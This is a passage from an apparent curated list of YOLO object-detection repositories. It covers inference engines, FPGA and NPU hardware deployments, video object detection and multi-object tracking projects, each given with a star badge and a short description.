[FLamefiREz/yolov10-android-ncnn](https://github.com/FLamefiREz/yolov10-android-ncnn) <img src="https://img.shields.io/github/stars/FLamefiREz/yolov10-android-ncnn?style=social"/> : yolov10-android-ncnn. - ##### MNN - [MNN](https://github.com/alibaba/MNN) <img src="https://img.shields.io/github/stars/alibaba/MNN?style=social"/> : MNN is a blazing fast, lightweight deep learning framework, battle-tested by business-critical use cases in Alibaba. (**[MLSys 2020](https://proceedings.mlsys.org/paper/2020/hash/8f14e45fceea167a5a36dedd4bea2543-Abstract.html)**) - [apxlwl/MNN-yolov3](https://github.com/apxlwl/MNN-yolov3) <img src="https://img.shields.io/github/stars/apxlwl/MNN-yolov3?style=social"/> : MNN demo of Strongeryolo, including channel pruning, android support... - ##### DeepStream - [NVIDIA-AI-IOT/deepstream_reference_apps](https://github.com/NVIDIA-AI-IOT/deepstream_reference_apps) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/deepstream_reference_apps?style=social"/> : Reference Apps using DeepStream 6.1. - [NVIDIA-AI-IOT/deepstream_python_apps](https://github.com/NVIDIA-AI-IOT/deepstream_python_apps) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/deepstream_python_apps?style=social"/> : DeepStream SDK Python bindings and sample applications. - [NVIDIA-AI-IOT/deepstream_python_apps](https://github.com/NVIDIA-AI-IOT/yolov5_gpu_optimization) <img src="https://img.shields.io/github/stars/NVIDIA-AI-IOT/yolov5_gpu_optimization?style=social"/> : This repository provides YOLOV5 GPU optimization sample. - [marcoslucianops/DeepStream-Yolo](https://github.com/marcoslucianops/DeepStream-Yolo) <img src="https://img.shields.io/github/stars/marcoslucianops/DeepStream-Yolo?style=social"/> : NVIDIA DeepStream SDK 6.1.1 / 6.1 / 6.0.1 / 6.0 implementation for YOLO models. - [DanaHan/Yolov5-in-Deepstream-5.0](https://github.com/DanaHan/Yolov5-in-Deepstream-5.0) <img src="https://img.shields.io/github/stars/DanaHan/Yolov5-in-Deepstream-5.0?style=social"/> : Describe how to use yolov5 in Deepstream 5.0. - [ozinc/Deepstream6_YoloV5_Kafka](https://github.com/ozinc/Deepstream6_YoloV5_Kafka) <img src="https://img.shields.io/github/stars/ozinc/Deepstream6_YoloV5_Kafka?style=social"/> : This repository gives a detailed explanation on making custom trained deepstream-Yolo models predict and send message over kafka. - [kn1ghtf1re/yolov8-deepstream-6-1](https://github.com/kn1ghtf1re/yolov8-deepstream-6-1) <img src="https://img.shields.io/github/stars/kn1ghtf1re/yolov8-deepstream-6-1?style=social"/> : YOLOv8 by Ultralytics in DeepStream 6.1. - [bharath5673/Deepstream](https://github.com/bharath5673/Deepstream) <img src="https://img.shields.io/github/stars/bharath5673/Deepstream?style=social"/> : yolov2 ,yolov5 ,yolov6 ,yolov7 ,yolov7,yolovR ,yolovX on deepstream. - [Savant](https://github.com/insight-platform/Savant) <img src="https://img.shields.io/github/stars/insight-platform/Savant?style=social"/> : Python Computer Vision & Video Analytics Framework With Batteries Included. [savant-ai.io](https://savant-ai.io/) - ##### Other Engine - [TVM](https://github.com/apache/tvm) <img src="https://img.shields.io/github/stars/apache/tvm?style=social"/> : Open deep learning compiler stack for cpu, gpu and specialized accelerators. - [ceccocats/tkDNN](https://github.com/ceccocats/tkDNN) <img src="https://img.shields.io/github/stars/ceccocats/tkDNN?style=social"/> : Deep neural network library and toolkit to do high performace inference on NVIDIA jetson platforms. "A Systematic Assessment of Embedded Neural Networks for Object Detection". (**[IEEE ETFA 2020](https://ieeexplore.ieee.org/document/9212130)**) - [Tengine](https://github.com/OAID/Tengine) <img src="https://img.shields.io/github/stars/OAID/Tengine?style=social"/> : Tengine is a lite, high performance, modular inference engine for embedded device. - [Paddle Lite](https://github.com/paddlepaddle/paddle-lite) <img src="https://img.shields.io/github/stars/paddlepaddle/paddle-lite?style=social"/> : Multi-platform high performance deep learning inference engine (้ฃžๆกจๅคš็ซฏๅคšๅนณๅฐ้ซ˜ๆ€ง่ƒฝๆทฑๅบฆๅญฆไน ๆŽจ็†ๅผ•ๆ“Ž๏ผ‰ใ€‚ - [DeployAI/nndeploy](https://github.com/DeployAI/nndeploy) <img src="https://img.shields.io/github/stars/DeployAI/nndeploy?style=social"/> : nndeploy is a cross-platform, high-performing, and straightforward AI model deployment framework. We strive to deliver a consistent and user-friendly experience across various inference framework in complex deployment environments and focus on performance. nndeployไธ€ๆฌพ่ทจๅนณๅฐใ€้ซ˜ๆ€ง่ƒฝใ€็ฎ€ๅ•ๆ˜“็”จ็š„ๆจกๅž‹็ซฏๅˆฐ็ซฏ้ƒจ็ฝฒๆก†ๆžถใ€‚ๆˆ‘ไปฌ่‡ดๅŠ›ไบŽๅฑ่”ฝไธๅŒๆŽจ็†ๆก†ๆžถ็š„ๅทฎๅผ‚๏ผŒๆไพ›ไธ€่‡ดไธ”็”จๆˆทๅ‹ๅฅฝ็š„็ผ–็จ‹ไฝ“้ชŒ๏ผŒๅŒๆ—ถไธ“ๆณจไบŽ้ƒจ็ฝฒๅ…จๆต็จ‹็š„ๆ€ง่ƒฝใ€‚ - [yhwang-hub/dl_model_infer](https://github.com/yhwang-hub/dl_model_infer) <img src="https://img.shields.io/github/stars/yhwang-hub/dl_model_infer?style=social"/> : his is a c++ version of the AI reasoning library. Currently, it only supports the reasoning of the tensorrt model. The follow-up plan supports the c++ reasoning of frameworks such as Openvino, NCNN, and MNN. There are two versions for pre- and post-processing, c++ version and cuda version. It is recommended to use the cuda version., This repository provides accelerated deployment cases of deep learning CV popular models, and cuda c supports dynamic-batch image process, infer, decode, NMS. - [hollance/YOLO-CoreML-MPSNNGraph](https://github.com/hollance/YOLO-CoreML-MPSNNGraph) <img src="https://img.shields.io/github/stars/hollance/YOLO-CoreML-MPSNNGraph?style=social"/> : Tiny YOLO for iOS implemented using CoreML but also using the new MPS graph API. - [r4ghu/iOS-CoreML-Yolo](https://github.com/r4ghu/iOS-CoreML-Yolo) <img src="https://img.shields.io/github/stars/r4ghu/iOS-CoreML-Yolo?style=social"/> : This is the implementation of Object Detection using Tiny YOLO v1 model on Apple's CoreML Framework. - [airockchip/rknn_model_zoo](https://github.com/airockchip/rknn_model_zoo) <img src="https://img.shields.io/github/stars/airockchip/rknn_model_zoo?style=social"/> : Rockchip Neural Network(RKNN)ๆ˜ฏ็‘ž่Šฏๅพฎไธบไบ†ๅŠ ้€Ÿๆจกๅž‹ๆŽจ็†่€ŒๅŸบไบŽ่‡ช่บซNPU็กฌไปถๆžถๆž„ๅฎšไน‰็š„ไธ€ๅฅ—ๆจกๅž‹ๆ ผๅผ.ไฝฟ็”จ่ฏฅๆ ผๅผๅฎšไน‰็š„ๆจกๅž‹ๅœจRockchip NPUไธŠๅฏไปฅ่Žทๅพ—่ฟœ้ซ˜ไบŽCPU/GPU็š„ๆ€ง่ƒฝใ€‚ - [LynxiTechnology/Lynxi-model-zoo](https://github.com/LynxiTechnology/Lynxi-model-zoo) <img src="https://img.shields.io/github/stars/LynxiTechnology/Lynxi-model-zoo?style=social"/> : Lynxi-model-zoo. - ### FPGA TPU NPU Hardware Deployment #### FPGA TPU NPU ็กฌไปถ้ƒจ็ฝฒ - ##### FPGA - [Xilinx/Vitis-AI](https://github.com/Xilinx/Vitis-AI/tree/master/demo) <img src="https://img.shields.io/github/stars/Xilinx/Vitis-AI?style=social"/> : Vitis AI offers a unified set of high-level C++/Python programming APIs to run AI applications across edge-to-cloud platforms, including DPU for Alveo, and DPU for Zynq Ultrascale+ MPSoC and Zynq-7000. It brings the benefits to easily port AI applications from cloud to edge and vice versa. 10 samples in [VART Samples](https://github.com/Xilinx/Vitis-AI/tree/master/demo/VART) are available to help you get familiar with the unfied programming APIs. [Vitis-AI-Library](https://github.com/Xilinx/Vitis-AI/tree/master/demo/Vitis-AI-Library) provides an easy-to-use and unified interface by encapsulating many efficient and high-quality neural networks. - [tensil-ai/tensil](https://github.com/tensil-ai/tensil) <img src="https://img.shields.io/github/stars/tensil-ai/tensil?style=social"/> : Open source machine learning accelerators. [www.tensil.ai](https://www.tensil.ai/) - [19801201/SpinalHDL_CNN_Accelerator](https://github.com/19801201/SpinalHDL_CNN_Accelerator) <img src="https://img.shields.io/github/stars/19801201/SpinalHDL_CNN_Accelerator?style=social"/> : CNN accelerator implemented with Spinal HDL. - [dhm2013724/yolov2_xilinx_fpga](https://github.com/dhm2013724/yolov2_xilinx_fpga) <img src="https://img.shields.io/github/stars/dhm2013724/yolov2_xilinx_fpga?style=social"/> : YOLOv2 Accelerator in Xilinx's Zynq-7000 Soc(PYNQ-z2, Zedboard and ZCU102). (**[็ก•ๅฃซ่ฎบๆ–‡ 2019](https://kns.cnki.net/KCMS/detail/detail.aspx?dbcode=CMFD&dbname=CMFDTEMP&filename=1019228234.nh&uid=WEEvREcwSlJHSldRa1FhdXNXaEhoOGhUTzA5T0tESzdFZ2pyR1NJR1ZBaz0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&v=MjE5NTN5dmdXN3JBVkYyNkY3RzZGdFBQcTVFYlBJUjhlWDFMdXhZUzdEaDFUM3FUcldNMUZyQ1VSTE9lWnVkdUY=), [็”ตๅญๆŠ€ๆœฏๅบ”็”จ 2019](https://kns.cnki.net/KCMS/detail/detail.aspx?dbcode=CJFQ&dbname=CJFDLAST2019&filename=DZJY201908009&uid=WEEvREcwSlJHSldRa1FhdXNXaEhoOGhUTzA5T0tESzdFZ2pyR1NJR1ZBaz0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&v=MDU0NDJDVVJMT2VadWR1Rnl2Z1c3ck1JVGZCZDdHNEg5ak1wNDlGYllSOGVYMUx1eFlTN0RoMVQzcVRyV00xRnI=), [่ฎก็ฎ—ๆœบ็ง‘ๅญฆไธŽๆŽข็ดข 2019](https://kns.cnki.net/KCMS/detail/detail.aspx?dbcode=CJFQ&dbname=CJFDTEMP&filename=KXTS201910005&uid=WEEvREcwSlJHSldRa1FhdXNXaEhoOGhUTzA5T0tESzdFZ2pyR1NJR1ZBaz0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&v=MjkwNzdXTTFGckNVUkxPZVp1ZHVGeXZnVzdyT0xqWGZmYkc0SDlqTnI0OUZZWVI4ZVgxTHV4WVM3RGgxVDNxVHI=)**) - [Yu-Zhewen/Tiny_YOLO_v3_ZYNQ](https://github.com/Yu-Zhewen/Tiny_YOLO_v3_ZYNQ) <img src="https://img.shields.io/github/stars/Yu-Zhewen/Tiny_YOLO_v3_ZYNQ?style=social"/> : Implement Tiny YOLO v3 on ZYNQ. "A Parameterisable FPGA-Tailored Architecture for YOLOv3-Tiny". (**[ARC 2020](https://link.springer.com/chapter/10.1007/978-3-030-44534-8_25)**) - [HSqure/ultralytics-pt-yolov3-vitis-ai-edge](https://github.com/HSqure/ultralytics-pt-yolov3-vitis-ai-edge) <img src="https://img.shields.io/github/stars/HSqure/ultralytics-pt-yolov3-vitis-ai-edge?style=social"/> : This demo is only used for inference testing of Vitis AI v1.4 and quantitative compilation of DPU. It is compatible with the training results of [ultralytics/yolov3](https://github.com/ultralytics/yolov3) v9.5.0 (it needs to use the model saving method of Pytorch V1.4). - [mcedrdiego/Kria_yolov3_ppe](https://github.com/mcedrdiego/Kria_yolov3_ppe) <img src="https://img.shields.io/github/stars/mcedrdiego/Kria_yolov3_ppe?style=social"/> : Kria KV260 Real-Time Personal Protective Equipment Detection. "Deep Learning for Site Safety: Real-Time Detection of Personal Protective Equipment". (**[Automation in Construction 2020](https://www.sciencedirect.com/science/article/abs/pii/S0926580519308325)**) - [xlsjdjdk/Ship-Detection-based-on-YOLOv3-and-KV260](https://github.com/xlsjdjdk/Ship-Detection-based-on-YOLOv3-and-KV260) <img src="https://img.shields.io/github/stars/xlsjdjdk/Ship-Detection-based-on-YOLOv3-and-KV260?style=social"/> : This is the entry project of the Xilinx Adaptive Computing Challenge 2021. It uses YOLOv3 for ship target detection in optical remote sensing images, and deploys DPU on the KV260 platform to achieve hardware acceleration. - [Pomiculture/YOLOv4-Vitis-AI](https://github.com/Pomiculture/YOLOv4-Vitis-AI) <img src="https://img.shields.io/github/stars/Pomiculture/YOLOv4-Vitis-AI?style=social"/> : Custom YOLOv4 for apple recognition (clean/damaged) on Alveo U280 accelerator card using Vitis AI framework. - [mkshuvo2/ZCU104_YOLOv3_Post_Processing](https://github.com/mkshuvo2/ZCU104_YOLOv3_Post_Processing) <img src="https://img.shields.io/github/stars/mkshuvo2/ZCU104_YOLOv3_Post_Processing?style=social"/> : Tensor outputs form Vitis AI Runner Class for YOLOv3. - [puffdrum/v4tiny_pt_quant](https://github.com/puffdrum/v4tiny_pt_quant) <img src="https://img.shields.io/github/stars/puffdrum/v4tiny_pt_quant?style=social"/> : quantization for yolo with xilinx/vitis-ai-pytorch. - [chanshann/LITE_YOLOV3_TINY_VITISAI](https://github.com/chanshann/LITE_YOLOV3_TINY_VITISAI) <img src="https://img.shields.io/github/stars/chanshann/LITE_YOLOV3_TINY_VITISAI?style=social"/> : LITE_YOLOV3_TINY_VITISAI. - [LukiBa/zybo_yolo](https://github.com/LukiBa/zybo_yolo) <img src="https://img.shields.io/github/stars/LukiBa/zybo_yolo?style=social"/> : YOLO example implementation using Intuitus CNN accelerator on ZYBO ZYNQ-7000 FPGA board. - [matsuda-slab/YOLO_ZYNQ_MASTER](https://github.com/matsuda-slab/YOLO_ZYNQ_MASTER) <img src="https://img.shields.io/github/stars/matsuda-slab/YOLO_ZYNQ_MASTER?style=social"/> : Implementation of YOLOv3-tiny on FPGA. - [FerberZhang/Yolov2-FPGA-CNN-](https://github.com/FerberZhang/Yolov2-FPGA-CNN-) <img src="https://img.shields.io/github/stars/FerberZhang/Yolov2-FPGA-CNN-?style=social"/> : A demo for accelerating YOLOv2 in xilinx's fpga PYNQ. - [ChainZeeLi/FPGA_DPU](https://github.com/ChainZeeLi/FPGA_DPU) <img src="https://img.shields.io/github/stars/ChainZeeLi/FPGA_DPU?style=social"/> : This project is to implement YOLO v3 on Xilinx FPGA with DPU. - [xbdxwyh/yolov3_fpga_project](https://github.com/xbdxwyh/yolov3_fpga_project) <img src="https://img.shields.io/github/stars/xbdxwyh/yolov3_fpga_project?style=social"/> : yolov3_fpga_project. - [ZLkanyo009/Yolo-compression-and-deployment-in-FPGA](https://github.com/ZLkanyo009/Yolo-compression-and-deployment-in-FPGA) <img src="https://img.shields.io/github/stars/ZLkanyo009/Yolo-compression-and-deployment-in-FPGA?style=social"/> : ๅŸบไบŽFPGA้‡ๅŒ–็š„ไบบ่„ธๅฃ็ฝฉๆฃ€ๆต‹ใ€‚ - [xiying-boy/yolov3-AX7350](https://github.com/xiying-boy/yolov3-AX7350) <img src="https://img.shields.io/github/stars/xiying-boy/yolov3-AX7350?style=social"/> : ๅŸบไบŽHLS_YOLOV3็š„้ฉฑๅŠจๆ–‡ไปถใ€‚ - [himewel/yolowell](https://github.com/himewel/yolowell) <img src="https://img.shields.io/github/stars/himewel/yolowell?style=social"/> : A set of hardware architectures to build a co-design of convolutional neural networks inference at FPGA devices. - [embedeep/Free-TPU](https://github.com/embedeep/Free-TPU) <img src="https://img.shields.io/github/stars/embedeep/Free-TPU?style=social"/> : Free TPU for FPGA with Lenet, MobileNet, Squeezenet, Resnet, Inception V3, YOLO V3, and ICNet. Deep learning acceleration using Xilinx zynq (Zedboard or ZC702 ) or kintex-7 to solve image classification, detection, and segmentation problem. - [yarakigit/design_contest_yolo_change_ps_to_pl](https://github.com/yarakigit/design_contest_yolo_change_ps_to_pl) <img src="https://img.shields.io/github/stars/yarakigit/design_contest_yolo_change_ps_to_pl?style=social"/> : Converts pytorch yolo format weights to C header files for bare-metal (FPGA implementation). - [MasLiang/CNN-On-FPGA](https://github.com/MasLiang/CNN-On-FPGA) <img src="https://img.shields.io/github/stars/MasLiang/CNN-On-FPGA?style=social"/> : This is the code of the CNN on FPGA.But this can only be used for reference at present for some files are write coarsly using ISE. - [adamgallas/fpga_accelerator_yolov3tiny](https://github.com/adamgallas/fpga_accelerator_yolov3tiny) <img src="https://img.shields.io/github/stars/adamgallas/fpga_accelerator_yolov3tiny?style=social"/> : fpga_accelerator_yolov3tiny. - [ylk678910/tiny-yolov3-fpga](https://github.com/ylk678910/tiny-yolov3-fpga) <img src="https://img.shields.io/github/stars/ylk678910/tiny-yolov3-fpga?style=social"/> : Use an all-programmable SoC board to implement locating and tracking tasks. The hardware algorithm, a row-stationary-like strategy, can parallel calculate and reduce the storage buffer area on FPGA. - [zhen8838/K210_Yolo_framework](https://github.com/zhen8838/K210_Yolo_framework) <img src="https://img.shields.io/github/stars/zhen8838/K210_Yolo_framework?style=social"/> : Yolo v3 framework base on tensorflow, support multiple models, multiple datasets, any number of output layers, any number of anchors, model prune, and portable model to K210 ! - [SEASKY-Master/SEASKY_K210](https://github.com/SEASKY-Master/SEASKY_K210) <img src="https://img.shields.io/github/stars/SEASKY-Master/SEASKY_K210?style=social"/> : K210 PCB YOLO. - [SEASKY-Master/Yolo-for-k210](https://github.com/SEASKY-Master/Yolo-for-k210) <img src="https://img.shields.io/github/stars/SEASKY-Master/Yolo-for-k210?style=social"/> : Yolo-for-k210. - [TonyZ1Min/yolo-for-k210](https://github.com/TonyZ1Min/yolo-for-k210) <img src="https://img.shields.io/github/stars/TonyZ1Min/yolo-for-k210?style=social"/> : keras-yolo-for-k210. - [vseasky/yolo-for-k210](https://github.com/vseasky/yolo-for-k210) <img src="https://img.shields.io/github/stars/vseasky/yolo-for-k210?style=social"/> : Yolo-for-k210. - [InnoIPA/dpu-sc](https://github.com/InnoIPA/dpu-sc) <img src="https://img.shields.io/github/stars/innoipa/dpu-sc?style=social"/> : dpu-sc presented how to create quick demos to run AI inference(YOLOv4-Tiny, LPRNet) on DPU with MPSoC. - [InnoIPA/vaiGO](https://github.com/InnoIPA/vaiGo) <img src="https://img.shields.io/github/stars/innoipa/vaiGO?style=social"/> : vaiGO means Vitis-ai GO. We provide utility and tutorial that make it easy to convert a trained AI model into a bitstream that can be deployed on an FPGA Edge AI Box. - [InnoIPA/EXMU-X261-usermanual](https://github.com/InnoIPA/EXMU-X261-usermanual) <img src="https://img.shields.io/github/stars/innoipa/exmu-x261-usermanual?style=social"/> : We have built more defect detection solutions with YOLOv4-tiny on EXMU-X261. - ##### Other Hardware - [guichristmann/edge-tpu-tiny-yolo](https://github.com/guichristmann/edge-tpu-tiny-yolo) <img src="https://img.shields.io/github/stars/guichristmann/edge-tpu-tiny-yolo?style=social"/> : Run Tiny YOLO-v3 on Google's Edge TPU USB Accelerator. - [Charlie839242/-Trash-Classification-Car](https://github.com/Charlie839242/-Trash-Classification-Car) <img src="https://img.shields.io/github/stars/Charlie839242/-Trash-Classification-Car?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชๅŸบไบŽyolo-fastestๆจกๅž‹็š„ๅฐ่ฝฆ๏ผŒไธปๆŽงๆ˜ฏart-piๅผ€ๅ‘ๆฟ๏ผŒไฝฟ็”จไบ†rt threadๆ“ไฝœ็ณป็ปŸใ€‚ - [Charlie839242/Deploy-yolo-fastest-tflite-on-raspberry](https://github.com/Charlie839242/Deploy-yolo-fastest-tflite-on-raspberry) <img src="https://img.shields.io/github/stars/Charlie839242/Deploy-yolo-fastest-tflite-on-raspberry?style=social"/> : This project deploys a yolo fastest model in the form of tflite on raspberry 3b+. - [mahxn0/Hisi3559A_Yolov5](https://github.com/mahxn0/Hisi3559A_Yolov5) <img src="https://img.shields.io/github/stars/mahxn0/Hisi3559A_Yolov5?style=social"/> : ๅŸบไบŽhisi3559a็š„yolov5่ฎญ็ปƒ้ƒจ็ฝฒๅ…จๆต็จ‹ใ€‚ - [ZhenxinYUAN/YOLO_hi3516Deploy](https://github.com/ZhenxinYUAN/YOLO_hi3516Deploy) <img src="https://img.shields.io/github/stars/ZhenxinYUAN/YOLO_hi3516Deploy?style=social"/> : Deploy Yolo series algorithms on Hisilicon platform hi3516, including yolov3, yolov5, yolox, etc. - [jveitchmichaelis/edgetpu-yolo](https://github.com/jveitchmichaelis/edgetpu-yolo) <img src="https://img.shields.io/github/stars/jveitchmichaelis/edgetpu-yolo?style=social"/> : Minimal-dependency Yolov5 export and inference demonstration for the Google Coral EdgeTPU. - [xiaqing10/Hisi_YoLoV5](https://github.com/xiaqing10/Hisi_YoLoV5) <img src="https://img.shields.io/github/stars/xiaqing10/Hisi_YoLoV5?style=social"/> : ๆตทๆ€nnie่ท‘yolov5ใ€‚ - [BaronLeeLZP/hi3516dv300_nnie-yolov3-demo](https://github.com/BaronLeeLZP/hi3516dv300_nnie-yolov3-demo) <img src="https://img.shields.io/github/stars/BaronLeeLZP/hi3516dv300_nnie-yolov3-demo?style=social"/> : ๅœจๆตทๆ€Hisilicon็š„Hi3516dv300่Šฏ็‰‡ไธŠ๏ผŒๅˆฉ็”จnnieๅ’Œopencvๅบ“๏ผŒ็ฎ€ๆดไบ†ๅฎ˜ๆ–นyolov3็”จไพ‹ไธญๅ„็งๅคๆ‚็š„ๅตŒๅฅ—่ฐƒ็”จ/ๅคๆ‚็ผ–่ฏ‘๏ผŒๆไพ›ไบ†ไบคๅ‰็ผ–่ฏ‘ๅŽๅฏๆˆๅŠŸไธŠๆฟ้ƒจ็ฝฒ่ฟ่กŒ็š„demoใ€‚ - [OpenVINO-dev-contest/YOLOv7_OpenVINO](https://github.com/OpenVINO-dev-contest/YOLOv7_OpenVINO) <img src="https://img.shields.io/github/stars/OpenVINO-dev-contest/YOLOv7_OpenVINO?style=social"/> : This repository will demostrate how to deploy a offical YOLOv7 pre-trained model with OpenVINO runtime api. - [Zhou-sx/yolov5_Deepsort_rknn](https://github.com/Zhou-sx/yolov5_Deepsort_rknn) <img src="https://img.shields.io/github/stars/Zhou-sx/yolov5_Deepsort_rknn?style=social"/> : Track vehicles and persons on rk3588 / rk3399pro. - [littledeep/YOLOv5-RK3399Pro](https://github.com/littledeep/YOLOv5-RK3399Pro) <img src="https://img.shields.io/github/stars/littledeep/YOLOv5-RK3399Pro?style=social"/> : PyTorch-->ONNX-->RKNN. - [jnulzl/YOLOV5_RK1126](https://github.com/jnulzl/YOLOV5_RK1126) <img src="https://img.shields.io/github/stars/jnulzl/YOLOV5_RK1126?style=social"/> : yolov5 rk1126 cpp code. - [Qengineering/YoloCam](https://github.com/Qengineering/YoloCam) <img src="https://img.shields.io/github/stars/Qengineering/YoloCam?style=social"/> : AI camera with live feed, email notification, Gdrive storage and event-triggered GPIO. Raspberry Pi stand-alone AI-powered camera with live feed, email notification and event-triggered cloud storage. - [Applied-Deep-Learning-Lab/Yolov5_RK3588](https://github.com/Applied-Deep-Learning-Lab/Yolov5_RK3588) <img src="https://img.shields.io/github/stars/Applied-Deep-Learning-Lab/Yolov5_RK3588?style=social"/> : Yolov5_RK3588. - [LSH9832/edgeyolo](https://github.com/LSH9832/edgeyolo) <img src="https://img.shields.io/github/stars/LSH9832/edgeyolo?style=social"/> : an edge-real-time anchor-free object detector with decent performance. - [liuyuan000/Rv1126_YOLOv5-Lite](https://github.com/liuyuan000/Rv1126_YOLOv5-Lite) <img src="https://img.shields.io/github/stars/liuyuan000/Rv1126_YOLOv5-Lite?style=social"/> : YOLOv5-LiteๅœจRv1126้ƒจ็ฝฒใ€‚ - [cqu20160901/yolov10_rknn_Cplusplus](https://github.com/cqu20160901/yolov10_rknn_Cplusplus) <img src="https://img.shields.io/github/stars/cqu20160901/yolov10_rknn_Cplusplus?style=social"/> : yolov10 ็‘ž่Šฏๅพฎ rknn ๆฟ็ซฏ C++้ƒจ็ฝฒ๏ผŒไฝฟ็”จๅนณๅฐ rk3588ใ€‚ - [cqu20160901/yolov10_onnx_rknn_horizon_tensorRT](https://github.com/cqu20160901/yolov10_onnx_rknn_horizon_tensorRT) <img src="https://img.shields.io/github/stars/cqu20160901/yolov10_onnx_rknn_horizon_tensorRT?style=social"/> : yolov10 ็›ฎๆ ‡ๆฃ€ๆต‹้ƒจ็ฝฒ็‰ˆๆœฌ๏ผŒไพฟไบŽ็งปๆคไธๅŒๅนณๅฐ๏ผˆonnxใ€tensorRTใ€rknnใ€Horizon๏ผ‰๏ผŒๅ…จ็ฝ‘้ƒจ็ฝฒๆœ€็ฎ€ๅ•ใ€่ฟ่กŒ้€Ÿๅบฆๆœ€ๅฟซ็š„้ƒจ็ฝฒๆ–นๅผ๏ผˆๅ…จ็ฝ‘้ฆ–ๅ‘๏ผ‰ใ€‚ ## Applications - ### Video Object Detection #### ่ง†้ข‘็›ฎๆ ‡ๆฃ€ๆต‹ - [YOLOV](https://github.com/YuHengsss/YOLOV) <img src="https://img.shields.io/github/stars/YuHengsss/YOLOV?style=social"/> : "YOLOV: Making Still Image Object Detectors Great at Video Object Detection". (**[arXiv 2022](https://arxiv.org/abs/2208.09686)**) - [StreamYOLO](https://github.com/yancie-yjr/StreamYOLO) <img src="https://img.shields.io/github/stars/yancie-yjr/StreamYOLO?style=social"/> : "Real-time Object Detection for Streaming Perception". (**[CVPR 2022](https://arxiv.org/abs/2203.12338v1)**) - [REPP](https://github.com/AlbertoSabater/Robust-and-efficient-post-processing-for-video-object-detection) <img src="https://img.shields.io/github/stars/AlbertoSabater/Robust-and-efficient-post-processing-for-video-object-detection?style=social"/> : "Robust and efficient post-processing for video object detection". (**[IROS 2020](https://ieeexplore.ieee.org/abstract/document/9341600)**) - [NoScope](https://github.com/stanford-futuredata/noscope) <img src="https://img.shields.io/github/stars/stanford-futuredata/noscope?style=social"/> : "Noscope: optimizing neural network queries over video at scale". (**[arXiv 2017](https://arxiv.org/abs/1703.02529)**) - ### Object Tracking #### ็›ฎๆ ‡่ทŸ่ธช - #### Multi-Object Tracking ##### ๅคš็›ฎๆ ‡่ทŸ่ธช - [ujanshresstha/YOLOv10_DeepSORT](https://github.com/sujanshresstha/YOLOv10_DeepSORT) <img src="https://img.shields.io/github/stars/ujanshresstha/YOLOv10_DeepSORT?style=social"/> : This repository contains code for object detection and tracking in videos using the YOLOv10 object detection model and the DeepSORT algorithm. - [mikel-brostrom/yolo_tracking](https://github.com/mikel-brostrom/yolo_tracking) <img src="https://img.shields.io/github/stars/mikel-brostrom/yolo_tracking?style=social"/> : BoxMOT: pluggable SOTA tracking modules for segmentation, object detection and pose estimation models. - [mikel-brostrom/Yolov7_StrongSORT_OSNet](https://github.com/mikel-brostrom/Yolov7_StrongSORT_OSNet) <img src="https://img.shields.io/github/stars/mikel-brostrom/Yolov7_StrongSORT_OSNet?style=social"/> : Real-time multi-camera multi-object tracker using [YOLOv7](https://github.com/WongKinYiu/yolov7) and [StrongSORT](https://github.com/dyhBUPT/StrongSORT) with [OSNet](https://github.com/KaiyangZhou/deep-person-reid). - [RizwanMunawar/yolov8-object-tracking](https://github.com/RizwanMunawar/yolov8-object-tracking) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov8-object-tracking?style=social"/> : YOLOv8 Object Tracking Using PyTorch, OpenCV and Ultralytics. - [xuarehere/yolo_series_deepsort_pytorch](https://github.com/xuarehere/yolo_series_deepsort_pytorch) <img src="https://img.shields.io/github/stars/xuarehere/yolo_series_deepsort_pytorch?style=social"/> : Deepsort with yolo series. This project support the existing yolo detection model algorithm (YOLOv3, YOLOV4, YOLOV4Scaled, YOLOV5, YOLOV6, YOLOV7, YOLOV8, YOLOX, YOLOR, PPYOLOE ). - [JackWoo0831/Yolov7-tracker](https://github.com/JackWoo0831/Yolov7-tracker) <img src="https://img.shields.io/github/stars/JackWoo0831/Yolov7-tracker?style=social"/> : Yolo v7 and several Multi-Object Tracker(SORT, DeepSORT, ByteTrack, BoT-SORT, etc.) in VisDrone2019 Dataset. It uses a unified style and integrated tracker for easy embedding in your own projects. YOLOv7 + ๅ„็งtrackerๅฎž็Žฐๅคš็›ฎๆ ‡่ทŸ่ธชใ€‚ - [BoT-SORT](https://github.com/NirAharon/BoT-SORT) <img src="https://img.shields.io/github/stars/NirAharon/BoT-SORT?style=social"/> : "BoT-SORT: Robust Associations Multi-Pedestrian Tracking". (**[arXiv 2022](https://arxiv.org/abs/2206.14651)**) - [StrongSORT](https://github.com/dyhBUPT/StrongSORT) <img src="https://img.shields.io/github/stars/dyhBUPT/StrongSORT?style=social"/> : "StrongSORT: Make DeepSORT Great Again". (**[arXiv 2022](https://arxiv.org/abs/2202.13514)**) - [UAVMOT](https://github.com/LiuShuaiyr/UAVMOT) <img src="https://img.shields.io/github/stars/LiuShuaiyr/UAVMOT?style=social"/> : "Multi-Object Tracking Meets Moving UAV". (**[CVPR 2022](https://openaccess.thecvf.com/content/CVPR2022/html/Liu_Multi-Object_Tracking_Meets_Moving_UAV_CVPR_2022_paper.html)**) - [HKPolyU-UAV/AUTO](https://github.com/HKPolyU-UAV/AUTO) <img src="https://img.shields.io/github/stars/HKPolyU-UAV/AUTO?style=social"/> : "Dynamic Object Tracking on Autonomous UAV System for Surveillance Applications". (**[Sensors 2021](https://www.mdpi.com/1424-8220/21/23/7888)**) - [bharath5673/StrongSORT-YOLO](https://github.com/bharath5673/StrongSORT-YOLO) <img src="https://img.shields.io/github/stars/bharath5673/StrongSORT-YOLO?style=social"/> : Real-time multi-camera multi-object tracker using (YOLOv5, YOLOv7) and [StrongSORT](https://github.com/dyhBUPT/StrongSORT) with OSNet. - [mikel-brostrom/Yolov7_StrongSORT_OSNet](https://github.com/mikel-brostrom/Yolov7_StrongSORT_OSNet) <img src="https://img.shields.io/github/stars/mikel-brostrom/Yolov7_StrongSORT_OSNet?style=social"/> : Real-time multi-camera multi-object tracker using YOLOv7 and StrongSORT with OSNet. - 